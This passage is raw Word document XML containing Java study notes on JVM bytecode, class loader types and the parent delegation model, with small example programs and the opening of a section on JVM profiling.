      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (not machine code)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E10573" w14:textId="77777777" w:rsidR="00021997" w:rsidRPr="00CE4B95" w:rsidRDefault="00021997" w:rsidP="00AF1B80">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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is bytecode is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>platform-independent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709AEC02" w14:textId="77777777" w:rsidR="00021997" w:rsidRPr="00CE4B95" w:rsidRDefault="00021997" w:rsidP="00AF1B80">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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JVM on each platform interprets or compiles it to native code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025D03C3" w14:textId="77777777" w:rsidR="00021997" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00AF1B8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B107827">
          <v:rect id="_x0000_i1247" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="45660D35" w14:textId="77777777" w:rsidR="00021997" w:rsidRPr="00CE4B95" w:rsidRDefault="00021997" w:rsidP="00AF1B80">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2251673F" w14:textId="77777777" w:rsidR="00021997" w:rsidRPr="00CE4B95" w:rsidRDefault="00021997" w:rsidP="00AF1B80">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HelloWorld {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F2A3F8" w14:textId="77777777" w:rsidR="00021997" w:rsidRPr="00CE4B95" w:rsidRDefault="00021997" w:rsidP="00AF1B80">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228930E5" w14:textId="77777777" w:rsidR="00021997" w:rsidRPr="00CE4B95" w:rsidRDefault="00021997" w:rsidP="00AF1B80">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Hello from JVM!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042585D4" w14:textId="77777777" w:rsidR="00021997" w:rsidRPr="00CE4B95" w:rsidRDefault="00021997" w:rsidP="00AF1B80">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E8BD82E" w14:textId="77777777" w:rsidR="00021997" w:rsidRPr="00CE4B95" w:rsidRDefault="00021997" w:rsidP="00AF1B80">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5F11F19" w14:textId="77777777" w:rsidR="00021997" w:rsidRPr="00CE4B95" w:rsidRDefault="00021997" w:rsidP="00AF1B80">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56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iled to HelloWorld.class (bytecode)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E42D95F" w14:textId="77777777" w:rsidR="00021997" w:rsidRPr="00CE4B95" w:rsidRDefault="00021997" w:rsidP="00AF1B80">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56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VM loads and runs the bytecode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D68A0E" w14:textId="32E32D7A" w:rsidR="00102AE6" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00102AE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BCC2CE6">
          <v:rect id="_x0000_i1248" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F7461A" w14:textId="77777777" w:rsidR="005A57B7" w:rsidRPr="00CE4B95" w:rsidRDefault="005A57B7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="94" w:name="_Toc196307574"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are the different loaders in JVM?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="94"/>
    </w:p>
    <w:p w14:paraId="24A79CD3" w14:textId="19689999" w:rsidR="00EE10FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE10FC" w:rsidP="0016339C">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lass loaders in Java </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>dynamically load classes into memory</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when required. They're part of the JVM and follow the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>parent delegation model</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to maintain security and consistency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D381B6D" w14:textId="77777777" w:rsidR="00EE10FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0016339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0EECA6E">
          <v:rect id="_x0000_i1249" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C80F717" w14:textId="77777777" w:rsidR="00EE10FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE10FC" w:rsidP="0016339C">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Types of Class Load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71"/>
        <w:gridCol w:w="7633"/>
      </w:tblGrid>
      <w:tr w:rsidR="0016339C" w:rsidRPr="00CE4B95" w14:paraId="3E92FFFE" w14:textId="77777777" w:rsidTr="00EE10FC">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A942D08" w14:textId="77777777" w:rsidR="00EE10FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE10FC" w:rsidP="0016339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lass Loader</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="21907987" w14:textId="77777777" w:rsidR="00EE10FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE10FC" w:rsidP="0016339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16339C" w:rsidRPr="00CE4B95" w14:paraId="78B1A23F" w14:textId="77777777" w:rsidTr="00EE10FC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="287385D9"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1. Bootstrap ClassLoader</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72E28FC0"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ads core Java classes from rt.jar (like java.lang.*, java.util.*). Part of the JVM, written in native code.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0016339C" w:rsidRPr="00CE4B95" w14:paraId="03F06ACD" w14:textId="77777777" w:rsidTr="00EE10FC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51AA417F"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2. Extension (Platform) ClassLoader</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B9F93A9"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Loads classes from the ext directory ($JAVA_HOME/lib/ext). Now replaced by </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Platform ClassLoader</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> from Java 9.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0016339C" w:rsidRPr="00CE4B95" w14:paraId="3B49C0A5" w14:textId="77777777" w:rsidTr="00EE10FC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="393DFAFD"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3. Application (System) ClassLoader</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19D27E73"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Loads classes from the </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>classpath</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> specified by the user (.class files or JARs).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0016339C" w:rsidRPr="00CE4B95" w14:paraId="7A1B2CB0" w14:textId="77777777" w:rsidTr="00EE10FC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17703CA1"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4. Custom ClassLoader</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47D2B94A"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r-defined loader by extending ClassLoader class, useful for advanced use cases like encryption, hot reloading, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7F8E4FD9" w14:textId="77777777" w:rsidR="00EE10FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0016339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3D8CFED">
          <v:rect id="_x0000_i1250" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="119A380A" w14:textId="77777777" w:rsidR="00EE10FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE10FC" w:rsidP="0016339C">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Parent Delegation Model (Hierarchy)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64648304"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css</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0310CF"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pyEdit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A8C5AB"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ootstrap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB3FD52"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00A2893"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tension (Platform)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C37DEC"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6C29D80"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pplication (System)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03211E61"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89731C7"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ustom ClassLoader (if created)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5D5E29"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Each class loader </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>delegates</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the loading task to its </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>parent first</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. If the parent cannot find the class, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>only then</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> does the current loader try.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F22495" w14:textId="77777777" w:rsidR="00EE10FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0016339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FAD9B80">
          <v:rect id="_x0000_i1251" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F725239" w14:textId="77777777" w:rsidR="00EE10FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE10FC" w:rsidP="0016339C">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Check Which ClassLoader Loaded a Class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC95CB3"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF632F1"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pyEdit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620D2150"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TestLoader {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC3EB21"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73202E7F"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tring class loader: " + String.class.getClassLoader());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A4B25A"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TestLoader class loader: " + TestLoader.class.getClassLoader());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5AF60C"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59DEB8D"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66234BF"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utput:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608E69E3"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kotlin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528115E3"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pyEdit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3178EF"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 class loader: null   // Loaded by Bootstrap (native)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF95000" w14:textId="77777777" w:rsidR="00EE10FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE10FC" w:rsidP="001633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estLoader class loader: jdk.internal.loader.ClassLoaders$AppClassLoader@...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507EEE69" w14:textId="77777777" w:rsidR="00EE10FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0016339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233669F">
          <v:rect id="_x0000_i1252" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="308D06E4" w14:textId="77777777" w:rsidR="00EE10FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE10FC" w:rsidP="0016339C">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Use Case for Custom ClassLoader</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4E1D04" w14:textId="77777777" w:rsidR="00EE10FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE10FC" w:rsidP="0016339C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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ading classes over the network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BBE12B" w14:textId="77777777" w:rsidR="00EE10FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE10FC" w:rsidP="0016339C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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lementing sandboxed environments (JVM security)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABA09BC" w14:textId="77777777" w:rsidR="00EE10FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE10FC" w:rsidP="0016339C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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ot deployment in frameworks like Spring, Tomcat, OSGi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D7D5B1" w14:textId="6A643E9F" w:rsidR="00102AE6" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00102AE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4BC89E0D">
          <v:rect id="_x0000_i1253" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3484AA0F" w14:textId="650956EA" w:rsidR="00A8451E" w:rsidRPr="00CE4B95" w:rsidRDefault="00A8451E" w:rsidP="00A8451E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="95" w:name="_Toc196307575"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is JVM profiling?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="95"/>
    </w:p>
    <w:p w14:paraId="1EE87732" w14:textId="4F507196" w:rsidR="00A8451E" w:rsidRPr="00CE4B95" w:rsidRDefault="00A8451E" w:rsidP="006A794A">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VM profiling</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the process of </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>monitoring and analyzing the performance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of a Java application running on the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java Virtual Machine (JVM)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to identify bottlenecks, memory leaks, thread issues, CPU usage, and more.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A22C72" w14:textId="77777777" w:rsidR="00F268F4" w:rsidRPr="00CE4B95" w:rsidRDefault="00F268F4" w:rsidP="006A794A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57318211" w14:textId="32A52C53"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helps developers understand </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>how the application behaves at runtime</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which parts of the code consume the most resources, and how to optimize it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2157BC44" w14:textId="77777777" w:rsidR="00A8451E" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="006A794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4405547">
          <v:rect id="_x0000_i1254" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDE3A5F" w14:textId="77777777" w:rsidR="00A8451E" w:rsidRPr="00CE4B95" w:rsidRDefault="00A8451E" w:rsidP="006A794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Aspects of JVM Profiling:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117214CC"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Usage</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6094981F"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Monitor </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>heap</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non-heap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> memory usage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9CB813"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Detect </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>memory leaks</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excessive garbage collection (GC)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4E906F"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nalyze </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>object creation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and memory retention.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3307E2DE"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PU Usage</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509731E5"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Identify </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>methods or classes</w:t>
      </w:r>
